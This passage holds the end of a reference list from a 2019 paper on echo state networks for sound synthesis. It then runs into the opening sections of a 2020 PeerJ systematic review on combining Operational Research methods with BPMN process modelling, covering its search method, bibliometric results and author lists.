http://dx.doi.org/10.1016/j.neucom.2017.11.073 http://dx.doi.org/10.7717/peerj-cs.205 Jaeger H. 2002. Short term memory in echo state networks. Technical report. Fraunhofer Institute for Autonomous Intelligent Systems. Jaeger H. 2005. A tutorial on training recurrent neural networks, covering BPPT, RTRL, EKF and the ‘‘echo state network’’ approach. Technical report. Fraunhofer Institute for Autonomous Intelligent Systems. Jaeger H. 2010. The ‘‘echo state’’ approach to analysing and training recurrent neural networks-with an erratum note. Technical Report 148. Bonn, Germany: German National Research Center for Information Technology GMD. Jaeger H. 2014a. Conceptors: an easy introduction. ArXiv preprint. arXiv:1406.2671. Jaeger H. 2014b. Controlling recurrent neural networks by conceptors. ArXiv preprint. arXiv:1403.3369. Jaeger H. 2017. Using conceptors to manage neural long-term memories for temporal patterns. Journal of Machine Learning Research 18(13):1–43. Jaeger H, Eck D. 2006. Can’t get you out of my head: a connectionist model of cyclic rehearsal. In: ZiF Workshop. 310–335. Jaques N, Gu S, Bahdanau D, Hernández-Lobato JM, Turner RE, Eck D. 2016. Sequence tutor: Conservative fine-tuning of sequence generation models with kl-control. ArXiv preprint. arXiv:1611.02796. Jensen JH, Christensen MG, Ellis DP, Jensen SH. 2009. Quantitative analysis of a com- mon audio similarity measure. IEEE Transactions on Audio, Speech, and Language Processing 17(4):693–703. Jones B, Stekel D, Rowe J, Fernando C. 2007. Is there a liquid state machine in the bacterium Escherichia Coli? In: IEEE Symposium on artificial life, Hawaii, USA. Piscataway: IEEE. Keuninckx L, Danckaert J, Van der Sande G. 2017. Real-time audio processing with a cascade of discrete-time delay line-based reservoir computers. Cognitive Computation 9(3):315–326 DOI 10.1007/s12559-017-9457-5. Khunarsal P, Lursinsap C, Raicharoen T. 2013. Very short time environmental sound classification based on spectrogram pattern matching. Information Sciences 243:57–74. Kiefer C. 2014. Musical instrument mapping design with echo state networks. In: NIME ’14: Proceedings of the 12th international conference on New interfaces for musical expression. Lukoševičius M. 2012. A practical guide to applying echo state networks. In: Neural networks: tricks of the trade. Berlin: Springer, 659–686. Maass W, Natschläger T, Markram H. 2002. Real-time computing without stable states: a new framework for neural computation based on perturbations. Neural Computation 14(11):2531–2560. Magnusson T, Kiefer C. 2019. Dataset of sounds used with the Ixi Lang live coding en- vironment. Available at https://sussex.figshare.com/articles/Dataset_of_sounds_used_ with_the_Ixi_Lang_live_coding_environment/7764845 DOI 10.25377/sussex.7764845.v1. Mayer NM, Browne M. 2004. Echo state networks and self-prediction. In: International workshop on biologically inspired approaches to advanced information technology. 40–48. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 22/24 https://peerj.com http://arXiv.org/abs/1406.2671 http://arXiv.org/abs/1403.3369 http://arXiv.org/abs/1611.02796 http://dx.doi.org/10.1007/s12559-017-9457-5 https://sussex.figshare.com/articles/Dataset_of_sounds_used_with_the_Ixi_Lang_live_coding_environment/7764845 https://sussex.figshare.com/articles/Dataset_of_sounds_used_with_the_Ixi_Lang_live_coding_environment/7764845 http://dx.doi.org/10.25377/sussex.7764845.v1 http://dx.doi.org/10.7717/peerj-cs.205 McCormack J, Eldridge A, Dorin A, McIlwain P. 2011. Generative algorithms for making music: emergence, evolution, and ecosystems. In: Dean RT, ed. The Oxford handbook of computer music. Oxford handbooks. Oxford: Oxford University Press. Mehri S, Kumar K, Gulrajani I, Kumar R, Jain S, Sotelo J, Courville A, Bengio Y. 2016. SampleRNN: an unconditional end-to-end neural audio generation model. ArXiv preprint. arXiv:1612.07837. Mudd T. 2017. Nonlinear dynamics in musical interactions. PhD thesis, The Open University. Available at http://oro.open.ac.uk/52231/ . Oord AVD, Dieleman S, Zen H, Simonyan K, Vinyals O, Graves A, Kalchbrenner N, Senior A, Kavukcuoglu K. 2016. Wavenet: a generative model for raw audio. ArXiv preprint. arXiv:1609.03499. Pampalk E, Dixon S, Widmer G. 2003. On the evaluation of perceptual similarity measures for music. In: of: Proceedings of the sixth international conference on digital audio effects (DAFx-03). 7–12. Roads C. 1978. Automated granular synthesis of sound. Computer Music Journal 2(2):61–62. Roads C. 2004. Microsound. Cambridge: MIT press. Sanfilippo D, Valle A. 2013. Feedback systems: an analytical framework. Computer Music Journal 37(2):12–27. Schrauwen B, Verstraeten D, Van Campenhout J. 2007. An overview of reservoir computing: theory, applications and implementations. In: Proceedings of the 15th European symposium on artificial neural networks. 471–482. Schwarz D. 2006. Concatenative sound synthesis: the early years. Journal of New Music Research 35(1):3–22. Slaney M, Covell M, Lassiter B. 1996. Automatic audio morphing. In: Acoustics, speech, and signal processing, 1996. ICASSP-96. Conference proceedings., 1996 IEEE international conference, on vol. 2. Piscataway: IEEE, 1001–1004. Sussillo D, Abbott L. 2012. Transferring learning from external to internal weights in echo-state networks with sparse connectivity. PLOS ONE 7(5):e37372 DOI 10.1371/journal.pone.0037372. Tidemann A, Demiris Y. 2008. Groovy neural networks. In: Proceeding of the 2008 conference on ECAI 2008: 18th european conference on artificial intelligence. Truax B. 1986. Real-time granular synthesis with the DMX-1000. In: Berg P, ed. Proceedings of the international computer music conference. The Hague: Computer Music Association. Truax B. 1994. Discovering inner complexity: time shifting and transposition with a real- time granulation technique. Computer Music Journal 18(2):38–48. Wyffels F, Schrauwen B. 2010. A comparative study of Reservoir Computing strategies for monthly time series prediction. Neurocomputing 73(10):1958–1964. Subspace Learning/Selected papers from the European Symposium on Time Series Prediction DOI 10.1016/j.neucom.2010.01.016. Wyse L. 2018. Real-valued parametric conditioning of an RNN for interactive sound synthesis. In: 6th International Workshop on Musical Metacreation, International Conference on Computational Creativity (ICCC). Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 23/24 https://peerj.com http://arXiv.org/abs/1612.07837 http://oro.open.ac.uk/52231/ http://arXiv.org/abs/1609.03499 http://dx.doi.org/10.1371/journal.pone.0037372 http://dx.doi.org/10.1016/j.neucom.2010.01.016 http://dx.doi.org/10.7717/peerj-cs.205 Xenakis I. 1971. Formalized music. Bloomington: Indiana University Press. Yee-King MJ, Fedden L, d’Inverno M. 2018. Automatic programming of VST sound synthesizers using deep networks and other techniques. IEEE Transactions on Emerging Topics in Computational Intelligence 2(2):150–159. Kiefer (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.205 24/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.205 work_kxuqkxr44vclndiw24jbsscsae ---- Approaches combining methods of Operational Research with Business Process Model and Notation: A systematic review Approaches combining methods of Operational Research with Business Process Model and Notation: A systematic review Hana Tomaskova1 and Gerhard-Wilhelm Weber2,3 1 University of Hradec Kralove, Faculty of Informatics and Management, Hradec Kralove, Czech Republic 2 Faculty of Engineering Management, Poznan University of Technology, Poznan, Poland 3 Institute of Applied Mathematics, Middle East Technical University, Ankara, Turkey ABSTRACT Background: Business process modelling is increasingly used not only by the companies’ management but also by scientists dealing with process models. Process modeling is seldom done without decision-making nodes, which is why operational research methods are increasingly included in the process analyses. Objective: This systematic literature review aimed to provide a detailed and comprehensive description of the relevant aspects of used operational research techniques in Business Process Model and Notation (BPMN) model. Methods: The Web Of Science of Clarivate Analytics was searched for 128 studies of that used operation research techniques and business process model and notation, published in English between 1 January 2004 and 18 May 2020. The inclusion criteria were as follows: Use of Operational Research methods in conjunction with the BPMN, and is available in full-text format. Articles were not excluded based on methodological quality. The background information of the included studies, as well as specific information on the used approaches, were extracted. Results: In this research, thirty-six studies were included and considered. A total of 11 specific methods falling into the field of Operations Research have been identified, and their use in connection with the process model was described. Conclusion: Operational research methods are a useful complement to BPMN process analysis. It serves not only to analyze the probability of the process, its economic and personnel demands but also for process reengineering. Subjects Data Science, Optimization Theory and Computation, Social Computing Keywords BPMN, Business process model and notation, Operation Research, OR, Decision making, Techniques, Review INTRODUCTION It has been more than 15 years since ‘Business Process Model and Notation’ or ‘Business Process Modelling Notation’ (BPMN) became the official notation for process modelling. During its lifetime, this notation has gained many users and, thanks to its user- friendliness, it is used in many areas. This wide usage has led to the interconnection and use of other technologies and methods. The fundamental problem of any complex process is decision making. Operational Research as a popular scientific approach is so often How to cite this article Tomaskova H, Weber G-W. 2020. Approaches combining methods of Operational Research with Business Process Model and Notation: A systematic review. PeerJ Comput. Sci. 6:e301 DOI 10.7717/peerj-cs.301 Submitted 25 February 2020 Accepted 15 September 2020 Published 9 November 2020 Corresponding author Hana Tomaskova, hana.tomaskova@uhk.cz Academic editor Daniel De Oliveira Additional Information and Declarations can be found on page 23 DOI 10.7717/peerj-cs.301 Copyright 2020 Tomaskova and Weber Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.301 mailto:hana.�tomaskova@�uhk.�cz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.301 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ associated with procedural issues, making its connection to BPMN is more than natural. This article focuses on the analysis of the relationship between the Business Process Model and Notation (BPMN) process modelling and specific methods of Operational Research. Business Process Modelling Notation was created by the Business Process Management Initiative (BPMI) as an open standards. It is very similar to flowcharts and Petri nets but offers much more sophisticated tools to describe and simulate behaviour. Silver (2009) stated that this approach is an ‘event-triggered behaviour,’ a description of the ‘something happened’ mode. Business Process Modelling is used to describe, recognize, re-engineer, or improve processes or practices, Tomaskova (2017). Business Process Model and Notation (BPMN) is the language that is used to model business process steps from start to end. The notation was explicitly designed for wide-ranging use in process analysis, The Object Management Group (2011). BPMN is both intelligible to non-specialists and allows a complicated processes between different participants to be represented. Another, very significant feature of BPMN is its ‘business-friendly’ orientation, which is essential for the company’s business and knowledge. Operational Research (OR) is concerned with formulating, modelling, and solving a variety of decision-making situations to find the optimal solutions. The company’s philosophy and decide over business data are the most crucial management actions. The task of the manager is to select in the real system the problem to be analyzed and to formulate it precisely. The standard way of doing this involves the expression of the economic model and then the formulation of a mathematical model. It is necessary to build a simplified model of the real financial systems that only includes the essential elements that describe the formulated problem. The manager has to set the goal of the analysis and subsequent optimization. It is important to define all operations and processes that influence this goal, to describe all the factors, and to verbally express the relationships between the stated purpose and the mentioned processes and factors. The article is divided into the following parts. The “Related works and background” section lists research articles that are relevant to a given combination of BPMN and OR areas and briefly. That part briefly provides essential information regarding the approaches that are fundamental to this systematic review. The “Research methodology” section describes a systematic search, i.e. entry conditions, exclusion criteria and limitations. The “Results” section presents the results of the analysis of articles fulfilling the requirements of the systematic review. We analyzed publications according to when they were published, their citations, the scientific areas covered, the cooperation of the authors and their keywords. Subsequently, we examined selected articles in terms of methodology, approach and research areas. In the “Discussion”, we focus on scientific gaps and future research. We present a research area where we expect an increase in publications, including their specific components. We also discuss the future development of applied methods and approaches. Finally, the “Conclusion” section summarizes the results and benefits of this study. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 2/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ RELATED WORKS AND BACKGROUND The background information and related works are listed in the paragraphs below. We first focused on process modelling and BPMN and then on OR and its essential methods and approaches. Organizational processes and decision support can be captured in many ways, and for many areas, we can mention, for example: strategic management by: Maltz & Kohli (1996), Certo (2003), Tomaskova (2009), Maresova (2010), Tsakalidis et al. (2019); product development research and innovation implementation, see Repenning, 2002, Garcia (2005); IT and economic analyzes see Shane & Cable (2002), Dedrick, Gurbaxani & Kraemer (2003), Krenek et al. (2014), Tomaskova, Kuhnova & Kuca (2015), Maresova, Tomaskova & Kuca (2016), Tomaskova et al. (2016), Maresova, Sobeslav & Krejcar (2017), Cheng et al. (2019), Tomaskova, Kopecky & Maresova (2019), Tomaskova et al. (2019), Kopecky & Tomaskova (2019), Kopecky & Tomaskova (2020); different simulation approaches analysis, see Sterman (1994), Kozlowski et al. (2013), Cimler et al. (2018) or non-standard optimization techniques by: Gavalec & Tomaskova (2010), Bacovsky, Gavalec & Tomaskova (2013), Tomaskova & Gavalec (2013, 2014), Gavalec, Plavka & Tomaskova (2014), Gavalec, Mls & Tomaskova (2015), Cimler et al. (2017), Oudah, Jabeen & Dixon (2018). Some authors have attempted to provide a solution for process model analysis. For example Melao & Pidd (2000) discussed the strengths and limitations of the various modelling approaches used in business process transformation. The article by Glassey (2008) compares three process modelling processes used in case studies. The article by Sadiq & Orlowska (2000) analyze process models using graph reduction techniques. Other authors like Van der Aalst et al. (2007), Krogstie, Sindre & Jorgensen (2006) use specific tools, frameworks and methods for process analysis and modelling. Business process modelling Today, process modelling and business process management (BPMN) have a significant impact. Process modelling is currently a mainly graphical representation of processes, e.g. in what order particular activities should be implemented and what inputs and outputs the processes require for proper functioning. The primary goal of process modelling is to increase the efficiency and effectiveness of the entire process as well as partial activities. Many business process modelling techniques have been proposed over the last decades, so the article Recker et al. (2009) comparatively assesses representational analyses of 12 popular process modelling techniques to provide insights into the extent to which they differ from each other. The review business process modelling literature and describe the leading process modelling techniques falling to and before 2004 are published in the articl Aguilar-Saven (2004). The topic of visualization of business process model has been investigated in publication Dani, Freitas & Thom (2019), where the authors performed a systematic literature review of the topic “visualization of business process models”. Kalogirou (2003) is a particularly fascinating article that illustrates how AI techniques might play an essential role in the modelling and prediction of the performance and control of the combustion process. Although BPM initially focused mainly on the Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 3/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ industrial, service and business sectors, it has also appeared in other sectors in recent years. The popularity of BPMN has been confirmed by articles such as Zarour et al. (2019), which presents the current state-of-the-art of BPN extensions. Publication De Ramon Fernandez, Ruiz Fernandez & Sabuco Garcia (2019) deals with the optimization of clinical processes. Business process model and notation Business process model and notation is a language for creating business process models Silver (2009). Under the auspices of the Object Management Group (OMG), the Business Process Management Initiative (BPMI) created the BPMN as an open standard in 2004 by the first version 1.0. In 2005, BPMI merged with the Object Management Group (OMG), and the following year, the latter issued the BPMN specification document. In 2010, BPMN version 2.0 was developed, and the current version of BPMN 2.0.2 was released in December 2013. History of BPMN and notation development is a frequent topic of BPMN publications, we can mention Nisler & Tomaskova (2017), Kocbek et al. (2015), Chinosi & Trombetta (2012), White (2008), Van der Aalst, Adriansyah & Van Dongen (2012) and Recker (2012). BPMN is similar to flowcharts and is based on the concept of Petri nets, but it is a more sophisticated and user-friendly language. The graphic form of BPMN makes it understandable even for non-experts. In BPMN, we distinguish several types of elements that we can use in modelling. The specific standards link these elements. In the base classification, we define four groups of items. These are Flow Objects, Connecting Objects, Swimlanes and Artifacts, see The Object Management Group (2011). Operational Reserach Operational Research (OR) is the well-known approach of using analytical and advanced methods to help make the best possible decisions. As early as 1980, Article by authors Shannon, Long & Buckles (1980) presented the results of a survey of the perception of the usefulness and knowledge of the 12 OR methodologies commonly used in the practice of industrial engineering. The article by Dubey (2010) defines the relationship between OR and another branch of sciences. The article Gu, Goetschalckx & McGinnis (2010) presents a detailed survey of the research on warehouse design, performance evaluation, practical case studies, and computational support tools. The article Negahban & Smith (2014) provided a review of discrete event simulation publications with a particular focus on applications in manufacturing. OR methods are often associated with new technologies. In article Sarac, Absi & Dauzère-Pérès (2010), a state-of-the-art on RFID technology deployments in supply chains was given to analyze the impact on the supply chain performance. Xu, Wang & Newman (2011), in their article, tries to identify future trends of computer-aided process planning (CAPP). Dynamic ride-share systems is investigated in the article Agatz et al. (2012). Linear programming One of the most popular areas of OR in practice is linear programming (LP). The mathematical model of linear programming tasks contains a single linear purpose Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 4/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ function, and the actual constraints of the problem are described only by linear equations and inequalities. These tasks are most often encountered in economic practices. Linear programming has been described in several books: Dantzig (1998), Schrijver (1998), Dorfman, Samuelson & Solow (1987). Multicriterial decision making The solving of multi-criteria decision-making (MCDM) tasks comprises the search for optimal values of the unknowns, which are simultaneously assessed according to several often contradictory criteria. Thus, the mathematical model of multi-criteria decision problems contains several purpose functions. Depending on how the sets of decision variants are defined, we are talking about the tasks of multi-criteria linear programming or multi-criteria evaluation of options. A review of applications of Analytic Hierarchy Process in operational management is inverstigated in Subramanian & Ramanathan (2012). The article Velasquez & Hester (2013) performs a literature review of common Multi-Criteria Decision Making methods. The authors present the results of a bibliometric-based survey on AHP and TOPSIS techniques in publication Zyoud & Fuchs-Hanusch (2017). Project planning Project management tasks consist of several separate activities that are interdependent and may be run simultaneously. The most commonly used method is the so-called network analysis, where a network graph is created from the left chronologically arranged project activities representing the project life cycle. The longest possible path from the beginning to the end of the project is recorded by “the critical path”. The non-observance of this path will lead to a slowing down of the whole project, whose time duration is to be optimized. The optimistic, pessimistic, and most probable estimate of the implementation of the entire project is determined. The article Nutt (1983) relates the project planning process and implementation. Critical Path Method (CPM) is found in the article Jaafari (1984), to be equally useful as a planning tool for linear or repetitive projects. The Resource-Constrained Project Scheduling Problem (RCPSP) is a general problem in scheduling. The article Pellerin, Perrier & Berthaut (2020) examines the general tendency of moving from pure metaheuristic methods to solving the RCPSP to hybrid methods that rely on different metaheuristic strategies (Cimr, Cimler & Tomaskova, 2018). Nonlinear programming Nonlinear programming is the case when the purpose function is not linear. Tasks then often have a large number of local extremes and often also have great difficulty finding them. Dynamic programming If constraints are functions of some parameter, which is most often time, we are talking about dynamic programming. This approach deals with the modelling of more complex multi-stage optimization problems divisible into related sub-problems. Depending on the time parameter, the system is always in one of the acceptable states during the process. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 5/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ At certain times it is necessary to choose from a set of possible decisions, which again results in the transition to the next state. We call the strategy a sequence of these states of the system and choices, looking for the course with the best valuation. Simulations are often used to model and analyze the operation of complex systems without realization and in less than real-time. � Queuing theory is a type of dynamic programming task. It deals with streamlining the functioning of systems in which it is necessary to gradually serve all units whose requirements are continuously met on so-called service lines. The challenge is to find the most effective way to handle these requirements. � Inventory management models address the issue of optimizing the supply process and the volume of inventory stored. Costs associated with ordering, issuing, and keeping stocks in stock should be minimized. Stochastic programming Stochastic programming deals with optimization problems in which they act as parameters of their constraints of random variables. Probabilistic calculus methods solve these problems, and their results have the character of random variables. Stochastic processes can also be ranked among tasks with the input data uncertainties. This approach is used to describe the behavior of systems evolving. We are talking about stochastic processes, a special case is the so-called Markov chains and Markov processes. Basic books on this topic are, for example: Kall, Wallace & Kall (1994), Birge & Louveaux (2011), Shapiro, Dentcheva & Ruszczy�nski (2014). RESEARCH METHODOLOGY Kitchenham & Charters (2007) highlighted three essential elements for a systematic literary review: the determination of the research question(s), the organisation of an unbiased and extensive analysis of related publications, and the determination of precise criteria of inclusion and exclusion. We identified three research questions: � Research question 1 (R1): Greater adaptability of BPMN elements causes greater application of this notation in publications. � Research question 2 (R2): The connection between BPMN and OR methods is most often applied to the business and economics areas. � Research question 3 (R3): The queue theory is the most widely used method in BPMN processes. The analysis process and criteria are given in the following relevant subsections. Eligibility criteria This study included publications listed in the Web Of Science (WOS) database of Clarivate Analytics that were published between 1 January 2004 and 18 May 2020. The year 2004 was selected as this is when BPMN was created by BPMI. Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 6/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ Exclusion criteria (EC) are: � EC1 = The publication was published in a language other than English. � EC2 = The full text of the publications was not available. � EC3 = The publication did not coincide with the topic of systematic research. � EC4 = BPMN was used only as a presentation tool and not as part of the research. Information sources and search The primary source of information for the study was the database Web Of Science (WOS) of Clarivate Analytics. An advanced search was performed for the search query mentiones below. The search was performed in the Topics (TS) section. Especially, the CORE database with the indexes listed in Table 1 was selected. The search was performed for ‘All document types,’ ‘All languages’ and the years 2004–2020. Study selection The first step of the review process involved title and abstract screening, followed by a full-text review of the remaining articles. Two independent assessors verified the results of the title and abstract screening and the full-text review. One assessed the suitability of the results from the perspective of OR and the other from an IT perspective, i.e. whether it was BPMN notation and its use. Articles were included if they met all the following criteria: (i) they used an OR method, (ii) a BPMN model was used and (iii) the complete text was available in English (abstracts, commentaries, letters and unpublished data were excluded). Studies were not excluded based on their methodological quality. The selected publications were examined from many perspectives, and each contribution was coded according to different criteria. This study aimed to enhance the discipline’s fundamental progress in understanding the link between OR methods and BPMN. The results of this study could encourage scientists to use OR methods for process analysis. Table 1 Web of Science Core Collection Indexes. Indexes Abbreviation Science citation index expanded (SCI-EXPANDED) Social sciences citation index (SSCI) Arts & humanities citation index (A&HCI) Conference proceedings citation index—science (CPCI-S) Conference proceedings citation index—social science & humanities (CPCI-SSH) Book citation index—science (BKCI-S) Book citation index—social sciences & humanities (BKCI-SSH) Emerging sources citation index (ESCI) Current chemical reactions (CCR-EXPANDED) Index chemicus (IC) Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 7/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ A limitation of this review was restricting the included articles to English-language publications that looked at process analysis using OR and BPMN published between 1 January 2004 and 18 May 2020. Relevant studies in other languages or published after 18 May 2020 may have been omitted. Data collection process Data was collected based on keywords selected from the article Lane, Mansour & Harpell (1993), which analyzed the quantitative techniques of Operation Research. From this document, the 18 Operation Research methods were selected and listed in the Table 2. The results were further categorized as to whether they corresponded to the given keywords and their meaning. The main results of the systematic literature review were obtained by analyzing by the two main guidelines of PRISMA: Moher et al. (2009) and MECIR: Higgins et al. (2018). Synthesis of results The individual studies were subjected to bibliometric analysis and then the studies were assessed according to the content and methods used. The bibliometric analysis describes and analyses up to date research. It aims at summarizing the latest progress in the field by quantitatively investigating the literature. This method provides a vast canvas of knowledge from the micro-level (institutes, researchers, and campuses) to the macro-level (countries and continents) Mryglod et al. (2013). Frequency analysis was used to find the most common scientific areas, the countries with the most publications and the most Table 2 Electronic search strategy in WoS. Query Results TS=(Computer AND programming AND BPMN) 6 TS=(Decision AND Analysis AND BPMN) 40 TS=(Decision AND theory AND BPMN) 7 TS=(Dynamic AND programming AND BPMN) 4 TS=(Heuristic AND programming AND BPMN) 0 TS=(Hypothesis AND testing AND BPMN) 2 TS=(Inventory AND control AND BPMN) 1 TS=(Linear AND regression AND BPMN) 2 TS=(Linear AND programming AND BPMN) 3 TS=(Math AND analysis AND BPMN) 0 TS=(Math AND programming AND BPMN) 0 TS=(Network AND analysis AND BPMN) 23 TS=(Nonlinear AND programming AND BPMN) 0 TS=(PERT AND BPMN) 0 TS=(Probability AND BPMN) 14 TS=(Queuing AND BPMN) 9 TS=(Statistic AND BPMN) 2 TS=(Stochastic AND processes AND BPMN) 15 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 8/32 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ common keywords. Science mapping was performing using the VOS viewer, Venn diagrams and bar and bubble graphs, Van Eck et al. (2010), Cobo et al. (2011). The Venn/Euler diagram graphically represents the relationships of the largest set of keywords. Euler diagrams are considered to be an effective means of visualizing containment, intersection, and exclusion. The goal of this type of graph is to communicate scientific results visually. Leonhard Euler first popularized the principle of labeled closed curves in the article Euler (1775) Alternative names for Euler diagrams include ‘Euler circles.’ They can also be incorrectly called Venn diagrams. Venn diagrams require all possible curve intersections to be present, so can be seen as a subset of Euler diagrams, that is, every Venn diagram is a Euler diagram, but not every Euler diagram is a Venn diagram. John Venn introduced Venn diagrams a hundred years after Euler in the article Venn (1880). Venn diagram is a schematic graph used in logic theory to depict collections of sets and represent their relationships. RESULTS The initial search resulted in 128 articles. After removing duplicates, 107 were left that underwent title and abstract screening. After screening, 61 articles remained that underwent full-text review. The final number of included articles for information abstraction was 36. Overview of the number of publications according to exclusion criteria is shown in Fig. 1. Eighteen keywords selected from the article by Lane, Mansour & Harpell (1993) were involved in the study. These keywords have been classified according to whether a publication meeting a study condition has been found for them. Only for 13 keywords were found a publication suitable for this study, as can be seen in Table 2 Categorization of publications based on the clarivate analytics Journals and books covered by the Web of Science Core Collection were assigned to at least one Web of Science category. Each Web of Science category was mapped to Figure 1 Overview of the systematic review. Full-size DOI: 10.7717/peerj-cs.301/fig-1 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 9/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-1 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ one research area Clarivate Analytics (2019). The research areas for the selected publications were: � COMPUTER SCIENCE (CS) � ENGINEERING (En) � OPERATIONAL RESEARCH MANAGEMENT SCIENCE (OR) � BUSINESS ECONOMICS (BE) � ROBOTICS (Ro) � AUTOMATION CONTROL SYSTEMS (ACS) � TELECOMMUNICATIONS (Te) � TRANSPORTATION (Tr) We selected four main groups, for which we compiled a bar graph and a Venn diagram after analysis. We chose the number of four research areas for representation in the Venn diagram; four sets are still well arranged. Another argument was the number of publications in other areas, where the set "ROBOTICS" contains two documents and the sets ‘AUTOMATION CONTROL SYSTEMS,’ ‘TELECOMMUNICATIONS’ and ‘TRANSPORTATION’ each one document. Bar graph on Fig. 2 is based on frequency analysis and contains the total number of publications in a given research area, their average number of citations, and the corresponding average number of pages per article. The graph shows the results by type of purpose. The first part shows the frequency of documents for each research areas. The second part focuses on the average number of citations, and the third shows the average number of pages per article. Figure 2 Research areas of selected publications, documents, average citations and average pages. Full-size DOI: 10.7717/peerj-cs.301/fig-2 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 10/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-2 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ The Venn diagram, in Fig. 3, shows selected four research areas as sets, including their intersection areas. In a specific area, we also stated the relevant number of documents and their average number of citations. This part of the bibliometric analysis showed us the answer to the research question R2. Although BPMN was explicitly designed for corporate analysis and economic analysis, and Operational Research focuses primarily on addressing managerial decisions, most publications were not in the field of business economics (BE). Surprisingly, this area actually has the fewest publications. The field of computer science had the most papers, and papers in the field of OR had the most citations. The field of BE had the most extended publications, however, i.e. the average number of pages per paper. Result1: Research question R2—not confirmed. Year of publication Figure 4 illustrates the distribution over time of the selected publications with BPMN milestones. The BPMN versions adoption dates, taken from OMG.org (2018), complements this figure. The different BPMN versions brought more or fewer changes in notation. While the changes between BPMN 1.0 and BPMN 1.2 were rather consmetics, e.g. renaming ‘Rule’ elements to ‘Conditional’ or slight increasing the number of elements from 48 to 55. The arrival of BPMN 2.0 was a major breakthrough and represented the largest revision of BPMN since its inception. In this version, it is possible to create a new ‘Choreography model,’ ‘Collaborations model’ and ‘Conversation model’ in BPMN in addition to collaborative processes and internal (private) business processes. Events are now divided into ‘interrupted’ and ‘non-interrupted’ and ‘catching’ and ‘throwing.’ The message type is Figure 3 Venn diagram of research areas of selected publications, the average number of citations is listed in the parentheses. Full-size DOI: 10.7717/peerj-cs.301/fig-3 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 11/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-3 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ newly introduced, and the data object has three specifications. BPMN 2.0 contains 116 elements. BPMN 2.0.2 included only minor modifications in terms of typos. Given the magnitude of changes between the different versions of the BPMN notation, the sharp increase in publications following the introduction of the BPMN 2.0 notation can be considered a confirmation of research question R1. It is very interesting that publications in the field of BE did not appear until 2017. Result: Research question R1—confirmed. The average number of citations of the analysed documents was 2.22. The first quartile was 0, and the third quartile was 3.75. The median was equal to 1 and data variability above the third quartile was limited to seven citations. We identified two outliers values: 12 citations for Hasic, De Smedt & Vanthienen (2018) and 15 citations for article Wu et al. (2015). Author analyses Bibliometric analysis cannot be done without review by the authors. We focused on illustrating co-authorship. The total number of authors of publications selected for this study was 84: al achhab, m (1), aouina, zk (1), ayani, r (1), aysolmaz, b (1), bahaweres, rb (1), batoulis, k (1), ben ayed, ne (1), ben said, l (1), ben-abdallah, h (3), bisogno, s (1), bocciarelli, p (1), boukadi, k (1), braghetto, kr (1), burattin, a (1), calabrese, a (1), ceballos, hg (2), chien, cf (1), cho, sy (1), creese, s (1), cunha, p (1), d’ambrogio, a (1), d’ambrogio, sa (1), de lara, j (1), de smedt, j (2), demirors, o (1), duran, f (2), el hichami, o (1), el mohajir, b (1), ferreira, je (1), figl, k (1), fitriyah, a (1), flores-solorio, v (2), fookes, c (1), garcia-vazquez, jp (1), ghiron, nl (1), ghlala, r (1), gomez-martinez, e (1), hansen, z (1), hansen, znl (3), happa, j (1), hasic, f (2), herbert, lt (8), holm, g (1), iren, d (1), jacobsen, p (3), jobczyk, k (1), kamrani, f (1), khlif, w (2), kluza, k (1), ligeza, a (1), manuel vara, j (1), marcos, e (1), mazhar, s (1), mendling, j (1), mendoza morales, le (1), mengersen, k (1), monsalve, c (1), moradi, f (1), naoum, m (1), onggo, bss (1), pablo garcia, j (1), Figure 4 Distribution of the publications by year and their representation in research areas. Full-size DOI: 10.7717/peerj-cs.301/fig-4 Tomaskova and Weber (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.301 12/32 http://dx.doi.org/10.7717/peerj-cs.301/fig-4 http://dx.doi.org/10.7717/peerj-cs.301 https://peerj.com/computer-science/ perez-blanco, f (1), pitchforth, j (1), proudlove, nc (1), rekik, m (1), rocha, c (2), rosemann, m (1), rozy, nf (1), salaun, g (2), sharp, r (4), sperduti, a (1), suchenia, a (1), tang, rz (1), tokdemir, g (1), tomaskova, h (1), vanden broucke, sklm (1), vanthienen, j (3), veluscek, m (1), villavicencio, m (1), vincent, jm (1), weske, m (1), wisniewski, p (1), wu, ppy (2), xie, y (1). These authors formed different sized groups, as can be seen in Fig. 5. We grouped the authors according to their 